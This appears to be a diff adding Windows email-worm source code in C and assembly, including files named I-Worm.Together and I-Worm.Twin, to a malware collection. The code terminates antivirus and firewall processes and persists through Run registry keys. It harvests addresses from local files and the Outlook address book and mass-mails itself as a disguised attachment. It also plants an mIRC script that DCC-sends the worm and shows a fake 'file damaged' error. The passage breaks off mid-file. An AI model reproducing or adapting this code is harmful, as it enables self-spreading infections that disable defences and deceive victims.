StopAV("NAVAPW32.EXE"); // Norton Antivirus
|
||||||
|
StopAV("NAVW32.EXE"); // Norton Antivirus
|
||||||
|
StopAV("NMAIN.EXE"); // Norton Antivirus
|
||||||
|
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
|
||||||
|
StopAV("ZONEALARM.EXE"); // ZoneAlarm
|
||||||
|
|
||||||
|
GetModuleFileName(hInst,filename,100);
|
||||||
|
GetSystemDirectory((char *)sysdir,100);
|
||||||
|
|
||||||
|
strcpy(sysdr,sysdir);
|
||||||
|
strcat(sysdr,"\\MSGDI32.EXE");
|
||||||
|
if((lstrcmp(filename,sysdr))!=0) {
|
||||||
|
Welcome();
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
hMAPI=LoadLibrary("MAPI32.DLL");
|
||||||
|
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
|
||||||
|
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
|
||||||
|
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
|
||||||
|
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
|
||||||
|
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
|
||||||
|
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
|
||||||
|
RegCloseKey(hReg);
|
||||||
|
GetWindowsDirectory((char *)winhtm,100);
|
||||||
|
|
||||||
|
_asm
|
||||||
|
{
|
||||||
|
call @wininet
|
||||||
|
db "WININET.DLL",0
|
||||||
|
@wininet:
|
||||||
|
call LoadLibrary
|
||||||
|
test eax,eax
|
||||||
|
jz end_asm
|
||||||
|
mov ebp,eax
|
||||||
|
call @inetconnect
|
||||||
|
db "InternetGetConnectedState",0
|
||||||
|
@inetconnect:
|
||||||
|
push ebp
|
||||||
|
call GetProcAddress
|
||||||
|
test eax,eax
|
||||||
|
jz end_wininet
|
||||||
|
mov edi,eax
|
||||||
|
verf:
|
||||||
|
push 0
|
||||||
|
push Tmp
|
||||||
|
call edi
|
||||||
|
dec eax
|
||||||
|
jnz verf
|
||||||
|
|
||||||
|
end_wininet:
|
||||||
|
push ebp
|
||||||
|
call FreeLibrary
|
||||||
|
end_asm:
|
||||||
|
jmp end_all_asm
|
||||||
|
|
||||||
|
Tmp dd 0
|
||||||
|
|
||||||
|
end_all_asm:
|
||||||
|
}
|
||||||
|
|
||||||
|
FindFile(desktop,"*.htm");
|
||||||
|
FindFile(favoris,"*.ht*");
|
||||||
|
FindFile(personal,"*.ht*");
|
||||||
|
FindFile(personal,"*.doc");
|
||||||
|
FindFile(winhtm,".ht*");
|
||||||
|
FindFile(cache,".ht*");
|
||||||
|
FreeLibrary(hMAPI);
|
||||||
|
FeedBack();
|
||||||
|
}
|
||||||
|
|
||||||
|
strcat(sysdir,"\\MsGDI32.exe");
|
||||||
|
CopyFile(filename,sysdir,FALSE);
|
||||||
|
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
|
||||||
|
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
|
||||||
|
RegCloseKey(hReg);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
void Welcome()
|
||||||
|
{
|
||||||
|
register char fileWel[100],messWel[25],titWel[25];
|
||||||
|
strcpy(fileWel,filename);
|
||||||
|
fileWel[0]=0;
|
||||||
|
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
|
||||||
|
wsprintf(titWel,"Error - %s",fileWel+i+1);
|
||||||
|
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
|
||||||
|
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
void StopAV(char *antivirus)
|
||||||
|
{
|
||||||
|
register BOOL term;
|
||||||
|
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
|
||||||
|
uProcess.dwSize=sizeof(uProcess);
|
||||||
|
rProcessFound=Process32First(lSnapshot,&uProcess);
|
||||||
|
while(rProcessFound) {
|
||||||
|
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
|
||||||
|
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
|
||||||
|
if(myproc!=NULL) {
|
||||||
|
term=TerminateProcess(myproc,0);
|
||||||
|
}
|
||||||
|
CloseHandle(myproc);
|
||||||
|
}
|
||||||
|
rProcessFound=Process32Next(lSnapshot,&uProcess);
|
||||||
|
}
|
||||||
|
CloseHandle(lSnapshot);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
void FindFile(char *folder, char *ext)
|
||||||
|
{
|
||||||
|
register bool abc=TRUE;
|
||||||
|
register HANDLE hFile;
|
||||||
|
char mail[128];
|
||||||
|
SetCurrentDirectory(folder);
|
||||||
|
hFile=FindFirstFile(ext,&ffile);
|
||||||
|
if(hFile!=INVALID_HANDLE_VALUE) {
|
||||||
|
while(abc) {
|
||||||
|
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
|
||||||
|
GetMail(ffile.cFileName,mail);
|
||||||
|
if(strlen(mail)>0) {
|
||||||
|
WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
|
||||||
|
sendmail(mail);
|
||||||
|
}
|
||||||
|
abc=FindNextFile(hFile,&ffile);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
void GetMail(char *namefile, char *mail)
|
||||||
|
{
|
||||||
|
HANDLE hf,hf2;
|
||||||
|
char *mapped;
|
||||||
|
DWORD size,i,k;
|
||||||
|
BOOL test=FALSE,valid=FALSE;
|
||||||
|
mail[0]=0;
|
||||||
|
|
||||||
|
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
|
||||||
|
if(hf==INVALID_HANDLE_VALUE)
|
||||||
|
return;
|
||||||
|
size=GetFileSize(hf,NULL);
|
||||||
|
if(!size)
|
||||||
|
return;
|
||||||
|
if(size<8)
|
||||||
|
return;
|
||||||
|
size-=100;
|
||||||
|
|
||||||
|
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
|
||||||
|
if(!hf2) {
|
||||||
|
CloseHandle(hf);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
|
||||||
|
if(!mapped) {
|
||||||
|
CloseHandle(hf2);
|
||||||
|
CloseHandle(hf);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
i=0;
|
||||||
|
while(i<size && !test) {
|
||||||
|
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
|
||||||
|
test=TRUE;
|
||||||
|
i+=strlen("mailto:");
|
||||||
|
k=0;
|
||||||
|
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
|
||||||
|
if(mapped[i]!=' ') {
|
||||||
|
mail[k]=mapped[i];
|
||||||
|
k++;
|
||||||
|
if(mapped[i]=='@')
|
||||||
|
valid=TRUE;
|
||||||
|
}
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
mail[k]=0;
|
||||||
|
} else
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(!valid)
|
||||||
|
mail[0]=0;
|
||||||
|
UnmapViewOfFile(mapped);
|
||||||
|
CloseHandle(hf2);
|
||||||
|
CloseHandle(hf);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
void sendmail(char *tos)
|
||||||
|
{
|
||||||
|
memset(&mess,0,sizeof(MapiMessage));
|
||||||
|
memset(&from,0,sizeof(MapiRecipDesc));
|
||||||
|
|
||||||
|
from.lpszName=NULL;
|
||||||
|
from.ulRecipClass=MAPI_ORIG;
|
||||||
|
mess.lpszSubject="Secret for you...";
|
||||||
|
mess.lpszNoteText="Hi Friend,\n\n"
|
||||||
|
"I send you my last work.\n"
|
||||||
|
"Mail me if you have some suggests.\n\n"
|
||||||
|
" See you soon. Best Regards.";
|
||||||
|
|
||||||
|
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
|
||||||
|
if(!mess.lpRecips)
|
||||||
|
return;
|
||||||
|
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
|
||||||
|
mess.lpRecips->lpszName=tos;
|
||||||
|
mess.lpRecips->lpszAddress=tos;
|
||||||
|
mess.lpRecips->ulRecipClass=MAPI_TO;
|
||||||
|
mess.nRecipCount=1;
|
||||||
|
|
||||||
|
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
|
||||||
|
if(!mess.lpFiles)
|
||||||
|
return;
|
||||||
|
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
|
||||||
|
mess.lpFiles->lpszPathName=filename;
|
||||||
|
mess.lpFiles->lpszFileName="My_Work.exe";
|
||||||
|
mess.nFileCount=1;
|
||||||
|
|
||||||
|
mess.lpOriginator=&from;
|
||||||
|
|
||||||
|
mSendMail(0,0,&mess,0,0);
|
||||||
|
|
||||||
|
free(mess.lpRecips);
|
||||||
|
free(mess.lpFiles);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
void FeedBack()
|
||||||
|
{
|
||||||
|
GetSystemTime(&systime);
|
||||||
|
switch(systime.wDay) {
|
||||||
|
case 7:
|
||||||
|
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
|
||||||
|
"With this, you stop the life of women and children.",
|
||||||
|
"Message to USA",MB_OK|MB_ICONHAND);
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 11:
|
||||||
|
dc=GetDC(NULL);
|
||||||
|
if(dc)
|
||||||
|
{
|
||||||
|
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
|
||||||
|
}
|
||||||
|
ReleaseDC(NULL,dc);
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 28:
|
||||||
|
stopv=fopen("StopIntifada.htm","w");
|
||||||
|
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
|
||||||
|
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
|
||||||
|
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
|
||||||
|
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
|
||||||
|
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
|
||||||
|
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
|
||||||
|
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
|
||||||
|
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
|
||||||
|
fprintf(stopv,"</body></html>");
|
||||||
|
fclose(stopv);
|
||||||
|
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
|
||||||
|
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
514
Win32/I-Worm.Together.asm
Normal file
514
Win32/I-Worm.Together.asm
Normal file
@ -0,0 +1,514 @@
|
|||||||
|
comment #
|
||||||
|
Name : I-Worm.Together
|
||||||
|
Author : PetiK
|
||||||
|
Date : March 10th 2002 - March 15th 2002
|
||||||
|
|
||||||
|
#
|
||||||
|
|
||||||
|
.586p
|
||||||
|
.model flat
|
||||||
|
.code
|
||||||
|
|
||||||
|
JUMPS
|
||||||
|
|
||||||
|
api macro a
|
||||||
|
extrn a:proc
|
||||||
|
call a
|
||||||
|
endm
|
||||||
|
|
||||||
|
PROCESSENTRY32 STRUCT
|
||||||
|
dwSize DWORD ?
|
||||||
|
cntUsage DWORD ?
|
||||||
|
th32ProcessID DWORD ?
|
||||||
|
th32DefaultHeapID DWORD ?
|
||||||
|
th32ModuleID DWORD ?
|
||||||
|
cntThreads DWORD ?
|
||||||
|
th32ParentProcessID DWORD ?
|
||||||
|
pcPriClassBase DWORD ?
|
||||||
|
dwFlags DWORD ?
|
||||||
|
szExeFile db 260 dup(?)
|
||||||
|
PROCESSENTRY32 ENDS
|
||||||
|
|
||||||
|
include Useful.inc
|
||||||
|
|
||||||
|
start_worm: call hide_worm
|
||||||
|
|
||||||
|
twin_worm:
|
||||||
|
push 50
|
||||||
|
mov esi,offset orig_worm
|
||||||
|
push esi
|
||||||
|
push 0
|
||||||
|
api GetModuleFileNameA ; esi = name of file
|
||||||
|
|
||||||
|
push 50
|
||||||
|
push offset verif_worm
|
||||||
|
api GetSystemDirectoryA
|
||||||
|
@pushsz "\EBASE64.EXE"
|
||||||
|
push offset verif_worm
|
||||||
|
api lstrcat
|
||||||
|
|
||||||
|
mov edi,offset copy_worm
|
||||||
|
push edi
|
||||||
|
push 50
|
||||||
|
push edi
|
||||||
|
api GetSystemDirectoryA
|
||||||
|
add edi,eax
|
||||||
|
mov eax,"aBe\"
|
||||||
|
stosd
|
||||||
|
mov eax,"46es"
|
||||||
|
stosd
|
||||||
|
mov eax,"exe."
|
||||||
|
stosd
|
||||||
|
pop edi ; edi = %system%\eBase64.exe
|
||||||
|
|
||||||
|
push offset orig_worm
|
||||||
|
push offset verif_worm
|
||||||
|
api lstrcmp
|
||||||
|
test eax,eax
|
||||||
|
jz continue_worm
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push edi
|
||||||
|
push esi
|
||||||
|
api CopyFileA ; copy file
|
||||||
|
|
||||||
|
push 20
|
||||||
|
push edi
|
||||||
|
push 1
|
||||||
|
@pushsz "Encode Base64"
|
||||||
|
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
||||||
|
push 80000002h
|
||||||
|
api SHSetValueA ; regedit
|
||||||
|
|
||||||
|
jmp end_worm
|
||||||
|
|
||||||
|
continue_worm:
|
||||||
|
|
||||||
|
fuck_antivirus:
|
||||||
|
@pushsz "OIFIL400.DLL"
|
||||||
|
api LoadLibraryA
|
||||||
|
test eax,eax
|
||||||
|
jz end_fuck_antivirus
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push 2
|
||||||
|
api CreateToolhelp32Snapshot
|
||||||
|
|
||||||
|
mov lSnapshot, eax
|
||||||
|
|
||||||
|
inc eax
|
||||||
|
jz end_fuck_antivirus
|
||||||
|
|
||||||
|
lea eax,uProcess
|
||||||
|
mov [eax.dwSize], SIZE PROCESSENTRY32
|
||||||
|
|
||||||
|
lea eax,uProcess
|
||||||
|
push eax
|
||||||
|
push lSnapshot
|
||||||
|
api Process32First
|
||||||
|
|
||||||
|
checkfile:
|
||||||
|
test eax, eax
|
||||||
|
jz InfExpRetCl
|
||||||
|
push ecx
|
||||||
|
|
||||||
|
mov eax,ProcessID
|
||||||
|
push offset uProcess
|
||||||
|
cmp eax,[uProcess.th32ProcessID]
|
||||||
|
je NextFile
|
||||||
|
|
||||||
|
lea ebx,[uProcess.szExeFile]
|
||||||
|
|
||||||
|
verif macro verifname,empty
|
||||||
|
local name
|
||||||
|
ifnb <empty>
|
||||||
|
%out too much arguments in macro 'nxt_instr'
|
||||||
|
.err
|
||||||
|
endif
|
||||||
|
call name
|
||||||
|
db verifname,0
|
||||||
|
name:
|
||||||
|
push ebx
|
||||||
|
api lstrstr
|
||||||
|
test eax,eax
|
||||||
|
endm
|
||||||
|
|
||||||
|
verif "ARG" ; Norton
|
||||||
|
jnz term
|
||||||
|
verif "AVP32.EXE" ; AVP
|
||||||
|
jnz term
|
||||||
|
verif "AVPCC.EXE" ; AVP
|
||||||
|
jnz term
|
||||||
|
verif "AVPM.EXE" ; AVP
|
||||||
|
jnz term
|
||||||
|
verif "WFINDV32.EXE"
|
||||||
|
jnz term
|
||||||
|
verif "F-AGNT95.EXE" ; F-SECURE
|
||||||
|
jnz term
|
||||||
|
verif "NAVAPW32.EXE" ; Norton
|
||||||
|
jnz term
|
||||||
|
verif "NAVW32.EXE" ; Norton
|
||||||
|
jnz term
|
||||||
|
verif "NMAIN.EXE"
|
||||||
|
jnz term
|
||||||
|
verif "PAVSHED.EXE" ; PandaSoftware
|
||||||
|
jnz term
|
||||||
|
verif "vshwin32.exe" ; McAfee
|
||||||
|
jnz term
|
||||||
|
verif "PETIKSHOW.EXE" ; McAfee
|
||||||
|
jnz term
|
||||||
|
|
||||||
|
@pushsz "ZONEALARM.EXE"
|
||||||
|
push ebx
|
||||||
|
api lstrstr
|
||||||
|
test eax,eax
|
||||||
|
jz NextFile
|
||||||
|
|
||||||
|
term: push [uProcess.th32ProcessID]
|
||||||
|
push 1
|
||||||
|
push 001F0FFFh
|
||||||
|
api OpenProcess
|
||||||
|
test eax,eax
|
||||||
|
jz NextFile
|
||||||
|
push 0
|
||||||
|
push eax
|
||||||
|
api TerminateProcess
|
||||||
|
|
||||||
|
push ebx
|
||||||
|
push offset new_name
|
||||||
|
api lstrcpy
|
||||||
|
mov esi,offset new_name
|
||||||
|
push esi
|
||||||
|
api lstrlen
|
||||||
|
add esi,eax
|
||||||
|
sub esi,4
|
||||||
|
mov [esi],"ktp."
|
||||||
|
lodsd
|
||||||
|
; mov [esi],"kmz."
|
||||||
|
; lodsd
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push offset new_name
|
||||||
|
push ebx
|
||||||
|
api CopyFileA
|
||||||
|
push ebx
|
||||||
|
api DeleteFileA
|
||||||
|
|
||||||
|
NextFile:
|
||||||
|
push offset uProcess
|
||||||
|
push lSnapshot
|
||||||
|
api Process32Next
|
||||||
|
jmp checkfile
|
||||||
|
|
||||||
|
InfExpRetCl:
|
||||||
|
push lSnapshot
|
||||||
|
api CloseHandle
|
||||||
|
end_fuck_antivirus:
|
||||||
|
|
||||||
|
call Spread_Mirc
|
||||||
|
call Spread_Worm
|
||||||
|
e_s_w:
|
||||||
|
|
||||||
|
end_worm:
|
||||||
|
push 0
|
||||||
|
api ExitProcess
|
||||||
|
|
||||||
|
hide_worm Proc
|
||||||
|
pushad
|
||||||
|
@pushsz "KERNEL32.DLL"
|
||||||
|
api GetModuleHandleA
|
||||||
|
xchg eax,ecx
|
||||||
|
jecxz end_hide_worm
|
||||||
|
@pushsz "RegisterServiceProcess" ; Registered as Service Process
|
||||||
|
push ecx
|
||||||
|
api GetProcAddress
|
||||||
|
xchg eax,ecx
|
||||||
|
jecxz end_hide_worm
|
||||||
|
push 1
|
||||||
|
push 0
|
||||||
|
call ecx
|
||||||
|
end_hide_worm:
|
||||||
|
popad
|
||||||
|
ret
|
||||||
|
hide_worm EndP
|
||||||
|
|
||||||
|
Spread_Mirc Proc
|
||||||
|
push offset copy_worm
|
||||||
|
push offset mirc_exe
|
||||||
|
api lstrcpy
|
||||||
|
call @mirc
|
||||||
|
db "C:\mirc\script.ini",0
|
||||||
|
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
|
||||||
|
db "C:\progra~1\mirc\script.ini",0
|
||||||
|
db "C:\progra~1\mirc32\script.ini",0
|
||||||
|
@mirc:
|
||||||
|
pop esi
|
||||||
|
push 4
|
||||||
|
pop ecx
|
||||||
|
mirc_loop:
|
||||||
|
push ecx
|
||||||
|
push 0
|
||||||
|
push 80h
|
||||||
|
push 2
|
||||||
|
push 0
|
||||||
|
push 1
|
||||||
|
push 40000000h
|
||||||
|
push esi
|
||||||
|
api CreateFileA
|
||||||
|
mov ebp,eax
|
||||||
|
push 0
|
||||||
|
push offset byte_write
|
||||||
|
@tmp_mirc:
|
||||||
|
push e_mirc - s_mirc
|
||||||
|
push offset s_mirc
|
||||||
|
push ebp
|
||||||
|
api WriteFile
|
||||||
|
push ebp
|
||||||
|
api CloseHandle
|
||||||
|
@endsz
|
||||||
|
pop ecx
|
||||||
|
loop mirc_loop
|
||||||
|
end_spread_mirc:
|
||||||
|
ret
|
||||||
|
Spread_Mirc EndP
|
||||||
|
|
||||||
|
Spread_Worm Proc
|
||||||
|
pushad
|
||||||
|
push 50
|
||||||
|
push offset vbs_worm
|
||||||
|
api GetSystemDirectoryA
|
||||||
|
@pushsz "\eBase.vbs"
|
||||||
|
push offset vbs_worm
|
||||||
|
api lstrcat
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push 20h
|
||||||
|
push 2
|
||||||
|
push 0
|
||||||
|
push 1
|
||||||
|
push 40000000h
|
||||||
|
push offset vbs_worm
|
||||||
|
api CreateFileA
|
||||||
|
mov ebp,eax
|
||||||
|
push 0
|
||||||
|
push offset byte_write
|
||||||
|
push e_vbs - s_vbs
|
||||||
|
push offset s_vbs
|
||||||
|
push ebp
|
||||||
|
api WriteFile
|
||||||
|
push ebp
|
||||||
|
api CloseHandle
|
||||||
|
|
||||||
|
push 1
|
||||||
|
push 0
|
||||||
|
push 0
|
||||||
|
push offset vbs_worm
|
||||||
|
@pushsz "open"
|
||||||
|
push 0
|
||||||
|
api ShellExecuteA
|
||||||
|
|
||||||
|
verif_inet:
|
||||||
|
push 0
|
||||||
|
push offset inet
|
||||||
|
api InternetGetConnectedState
|
||||||
|
dec eax
|
||||||
|
jnz verif_inet
|
||||||
|
|
||||||
|
push 50
|
||||||
|
push offset t_ini
|
||||||
|
api GetSystemDirectoryA
|
||||||
|
@pushsz "\together.ini"
|
||||||
|
push offset t_ini
|
||||||
|
api lstrcat
|
||||||
|
|
||||||
|
push 00h
|
||||||
|
push 80h
|
||||||
|
push 03h
|
||||||
|
push 00h
|
||||||
|
push 01h
|
||||||
|
push 80000000h
|
||||||
|
push offset t_ini
|
||||||
|
api CreateFileA
|
||||||
|
inc eax
|
||||||
|
je end_spread_worm
|
||||||
|
dec eax
|
||||||
|
xchg eax,ebx
|
||||||
|
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push 2
|
||||||
|
push eax
|
||||||
|
push ebx
|
||||||
|
api CreateFileMappingA
|
||||||
|
test eax,eax
|
||||||
|
je end_s1
|
||||||
|
xchg eax,ebp
|
||||||
|
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push 4
|
||||||
|
push ebp
|
||||||
|
api MapViewOfFile
|
||||||
|
test eax,eax
|
||||||
|
je end_s2
|
||||||
|
xchg eax,esi
|
||||||
|
|
||||||
|
push 0
|
||||||
|
push ebx
|
||||||
|
api GetFileSize
|
||||||
|
cmp eax,4
|
||||||
|
jbe end_s3
|
||||||
|
|
||||||
|
scan_mail:
|
||||||
|
xor edx,edx
|
||||||
|
mov edi,offset mail_addr
|
||||||
|
push edi
|
||||||
|
p_c: lodsb
|
||||||
|
cmp al," "
|
||||||
|
je car_s
|
||||||
|
cmp al,";"
|
||||||
|
je end_m
|
||||||
|
cmp al,"#"
|
||||||
|
je f_mail
|
||||||
|
cmp al,'@'
|
||||||
|
jne not_a
|
||||||
|
inc edx
|
||||||
|
not_a: stosb
|
||||||
|
jmp p_c
|
||||||
|
car_s: inc esi
|
||||||
|
jmp p_c
|
||||||
|
end_m: xor al,al
|
||||||
|
stosb
|
||||||
|
pop edi
|
||||||
|
test edx,edx
|
||||||
|
je scan_mail
|
||||||
|
call send_mail
|
||||||
|
jmp scan_mail
|
||||||
|
f_mail:
|
||||||
|
|
||||||
|
end_s3: push esi
|
||||||
|
api UnmapViewOfFile
|
||||||
|
end_s2: push ebp
|
||||||
|
api CloseHandle
|
||||||
|
end_s1: push ebx
|
||||||
|
api CloseHandle
|
||||||
|
|
||||||
|
end_spread_worm:
|
||||||
|
popad
|
||||||
|
jmp e_s_w
|
||||||
|
Spread_Worm EndP
|
||||||
|
|
||||||
|
send_mail:
|
||||||
|
xor eax,eax
|
||||||
|
push eax
|
||||||
|
push eax
|
||||||
|
push offset Message
|
||||||
|
push eax
|
||||||
|
push [sess]
|
||||||
|
api MAPISendMail
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
.data
|
||||||
|
; === Copy Worm ===
|
||||||
|
orig_worm db 50 dup (0)
|
||||||
|
copy_worm db 50 dup (0)
|
||||||
|
verif_worm db 50 dup (0)
|
||||||
|
sysTime db 16 dup(0)
|
||||||
|
|
||||||
|
; === Fuck AntiVirus ===
|
||||||
|
uProcess PROCESSENTRY32 <?>
|
||||||
|
ProcessID dd ?
|
||||||
|
lSnapshot dd ?
|
||||||
|
new_name db 100 dup (?)
|
||||||
|
|
||||||
|
; === Spread With mIrc ===
|
||||||
|
s_mirc: db "[script]",CRLF
|
||||||
|
db ";Don't edit this file.",CRLF,CRLF
|
||||||
|
db "n0=on 1:JOIN:{",CRLF
|
||||||
|
db "n1= /if ( $nick == $me ) { halt }",CRLF
|
||||||
|
db "n2= /.dcc send $nick "
|
||||||
|
mirc_exe db 50 dup (?)
|
||||||
|
db CRLF,"n3=}",0
|
||||||
|
e_mirc:
|
||||||
|
byte_write dd ?
|
||||||
|
|
||||||
|
; === Spread with Outlook ===
|
||||||
|
vbs_worm db 50 dup (0)
|
||||||
|
t_ini db 50 dup (0)
|
||||||
|
mail_addr db 128 dup (?)
|
||||||
|
inet dd 0
|
||||||
|
sess dd 0
|
||||||
|
|
||||||
|
subject db "Re: Answer",0
|
||||||
|
body db "Here for you...",0
|
||||||
|
filename db "funny_game.exe",0
|
||||||
|
|
||||||
|
Message dd ?
|
||||||
|
dd offset subject
|
||||||
|
dd offset body
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd 2
|
||||||
|
dd offset MsgFrom
|
||||||
|
dd 1
|
||||||
|
dd offset MsgTo
|
||||||
|
dd 1
|
||||||
|
dd offset Attach
|
||||||
|
|
||||||
|
MsgFrom dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
MsgTo dd ?
|
||||||
|
dd 1
|
||||||
|
dd offset mail_addr
|
||||||
|
dd offset mail_addr
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
Attach dd ?
|
||||||
|
dd ?
|
||||||
|
dd ?
|
||||||
|
dd offset orig_worm
|
||||||
|
dd offset filename
|
||||||
|
dd ?
|
||||||
|
|
||||||
|
|
||||||
|
s_vbs:
|
||||||
|
db 'On Error Resume Next',CRLF
|
||||||
|
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
|
||||||
|
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
|
||||||
|
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
|
||||||
|
db 'c.Close',CRLF
|
||||||
|
db 'Set ou=CreateObject("Outlook.Application")',CRLF
|
||||||
|
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
|
||||||
|
db 'adr=""',CRLF
|
||||||
|
db 'For Each mel in map.AddressLists',CRLF
|
||||||
|
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
|
||||||
|
db 'For O=1 To mel.AddressEntries.Count',CRLF
|
||||||
|
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
|
||||||
|
db 'Next',CRLF
|
||||||
|
db 'End If',CRLF
|
||||||
|
db 'Next',CRLF
|
||||||
|
db 'adr=adr &";#"',CRLF,CRLF
|
||||||
|
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
|
||||||
|
db 'c.WriteLine adr',CRLF
|
||||||
|
db 'c.Close',CRLF
|
||||||
|
e_vbs:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
signature db "I-Worm.Together "
|
||||||
|
author db "Coded by PetiK - 2002",00h
|
||||||
|
|
||||||
|
end start_worm
|
||||||
|
end
|
198
Win32/I-Worm.Twin.asm
Normal file
198
Win32/I-Worm.Twin.asm
Normal file
@ -0,0 +1,198 @@
|
|||||||
|
comment #
|
||||||
|
Name : I-Worm.Twin
|
||||||
|
Author : PetiK
|
||||||
|
Date : January 30th 2002 - February 1st 2002
|
||||||
|
Size : 6656 bytes
|
||||||
|
|
||||||
|
Action : See yourself. It's not complex.
|
||||||
|
#
|
||||||
|
|
||||||
|
.586p
|
||||||
|
.model flat
|
||||||
|
.code
|
||||||
|
|
||||||
|
JUMPS
|
||||||
|
|
||||||
|
api macro a
|
||||||
|
extrn a:proc
|
||||||
|
call a
|
||||||
|
endm
|
||||||
|
|
||||||
|
include useful.inc
|
||||||
|
include myinclude.inc
|
||||||
|
|
||||||
|
start: push 50
|
||||||
|
mov esi,offset orig_worm
|
||||||
|
push esi
|
||||||
|
push 0
|
||||||
|
api GetModuleFileNameA
|
||||||
|
|
||||||
|
push 25
|
||||||
|
push esi
|
||||||
|
push 1
|
||||||
|
@pushsz "AntiVirus Freeware"
|
||||||
|
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
||||||
|
push 80000002h
|
||||||
|
api SHSetValueA
|
||||||
|
|
||||||
|
@pushsz "C:\twin.vbs"
|
||||||
|
api DeleteFileA
|
||||||
|
|
||||||
|
push 50
|
||||||
